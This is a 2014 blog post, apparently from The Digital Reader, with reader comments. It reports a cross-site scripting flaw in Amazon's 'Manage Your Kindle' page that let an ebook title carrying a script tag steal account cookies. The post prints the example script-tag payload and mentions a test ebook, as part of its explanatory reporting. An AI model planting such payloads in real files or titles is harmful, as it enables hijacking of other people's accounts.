Your Amazon Account Can be Hacked via a Kindle eBook

5811777890_73cb670487[1]Amazon might not have a security issue at Audible but they do have one on their main website.Update: And it has been fixed.A security researcher has reported, and I can confirm, that Amazon has a security hole on the "manage Your Kindle" page - one which is relatively easy to fix.

Thanks to this hole, a hacker can gain access to the Amazon account simply by getting his victims to download an ebook which was itself hacked to include a script in the title:

Once an attacker manages to have an e-book (file, document, ...) with a title like

<script src="https://www.example.org/script.js"></script>

added to the victim's library, the code will be executed as soon as the victim opens the Kindle Library web page. As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim's Amazon account can be compromised.

I've tried it, and it does work. I saw something similar to the image which the hacker posted to his blog.

2014-reintrot[1]

As a result I would urge caution against buying or downloading ebooks from untrustworthy sources -  for the near future, at least. I expect Amazon will fix this problem shortly - that's what they did when it was first discovered last fall.

No this is not a new story, though it is just coming to light. The German ebook blog AlleseBook.de broke the story earlier today when they reported on the hacker who discovered this issue - and more importantly, provided an ebook which could prove the hack worked.

Benjamin Daniel Mussler writes that he discovered this security issue last October. He notified Amazon in November, and they fixed it 4 days later. That is great, but then then Amazon reintroduced the security hole earlier this year when they launched the new version of the "Manage Your Kindle" page.

As of the time I wrote this post, Mussler's hack still worked.  There's even an ebook which you can use to test the hack yourself, if you like. I would recommend against it, but it is up to you.

On a related note, if you're worried about being hacked, there is a simple rule you can follow to keep yourself safe.

I have a rule against downloading apps from questionable websites, one which I have long since applied to Epub ebooks (because they can contain Javascript)  and PDFs (because they can hold entire apps). Now it would seem that rule needs to be expanded to include Kindle ebooks as well.

image by Pitel

About Nate Hoffelder (11585 Articles)
Nate Hoffelder is the founder and editor of The Digital Reader:"I've been into reading ebooks since forever, but I only got my first ereader in July 2007. Everything quickly spiraled out of control from there. Before I started this blog in January 2010 I covered ebooks, ebook readers, and digital publishing for about 2 years as a part of MobileRead Forums. It's a great community, and being a member is a joy. But I thought I could make something out of how I covered the news for MobileRead, so I started this blog."

5 Comments on Your Amazon Account Can be Hacked via a Kindle eBook

  1. To prevent losing personal info because of hacking, I don’t provide any real info to Amazon (except my credit card no.). I only enter my credit card no. when I want to buy a book, (which I seldom do so). After buying it, I delete the no. It is just always dangerous to save any personal info online.

    • ” I don’t provide any real info to Amazon (except my credit card no.)” I applaud your caution, but you should be a bit more realistic about it… For one, you had to give also your name and your billing address, or othewise your CC wouldn’t have gone through. But more importantly, note that even in this very limited case, there is no report that credit card numbers were leaked: this should not be a surprise, because you can’t even seen your *own* credit card numbers on Amazon.com (go take a look). So if someone “takes over your account”, they *still* can’t see what your credit card numbers are. They also cannot change the shipping address that your account sends to, because this requires retyping your credit card number… which they don’t have. Likewise, they do not gain access to your password (this, too, is not shown to you on amazon.com).

      Do not confuse a very limited exploit – recall this required you to download an ebook to your Kindle that has “.js” in it, which is kind of like saying that email is very dangerous if you click on attachments willy-nilly – with the kind of massive data breach that Home Depot and others have had.

  2. Have always had a concern about the lack of security/protection on the Kindle. So with my Kindle+keyboard model, practice has been to download to computer and thence by USB cable to the device.

  3. This is potentially made worse by the fact that most of the cookies on Amazon’s site are not flagged Http-only. If a cookie is not flagged Http-only, it can be read by scripts. I see two different session tokens on my account, one of which is protected and one of which is not.

  4. Apparently Amazon has patched this up. I wonder if anyone’s tried a similar hack with Google Play Books. One is able to upload ePub files, and even read them in a browser, which might present a big surface area to attack. Don’t remember if Google’s ePub3 support includes JavaScript support.

18 Trackbacks & Pingbacks

  1. Votre compte Amazon peut être cracké au travers d’un eBook | Quoi lire ?
  2. Authors Target Directors in Amazon-Hachette Dispute | Digital Book World
  3. Rogue E-Books Could Pose Threat to Amazon Accounts | Malwarebytes Unpacked
  4. Hackers make the case for trusting Amazon’s and Apple’s “walled gardens” | PandoDaily
  5. Kindle security flaw can be exploited by hidden codes in e-books | Sprestige.com
  6. Leer un libro en tu Kindle puede hackear tu cuenta de Amazon | Francisco Unica
  7. Researchers Create A Kindle eBook That Can Hack Your Amazon Account | TechCrunch
  8. A Kindle E-Book Flaw Lets Hackers Access Your Amazon Account
  9. Your Amazon Account Can Be Hacked Via A Malicious Kindle Ebook | Gizmodo Australia
  10. Yahoo, Kindle, Music, Mathematica, More: Evening Buzz, September 17th, 2014 | ResearchBuzz
  11. Your Amazon Account Can Be Hacked Via a Malicious Kindle Ebook | Rob's Personal Aggregator
  12. Un hacker podría acceder a la cuenta de Amazon a través de un e-book pirateado
  13. Tuesday 16th of September |
  14. Adobe is Spying on Users, Collecting Data on Their eBook Libraries - The Digital Reader
  15. WTFery – Adobe collecting user data via Digital Editions, malicious ebook code, & more. | TymberDalton.com
  16. The End is Near (and we deserve it) . . . City Pays Alcoholics with Beer « Bayard & Holmes
  17. Cybercrime: The Net Was Not Built For Privacy | anna johnson-hill
  18. Amazon-Sicherheitslücke: Manipulierte E-Books als Hintertür › ifun.de

Leave a comment

Your email address will not be published.


*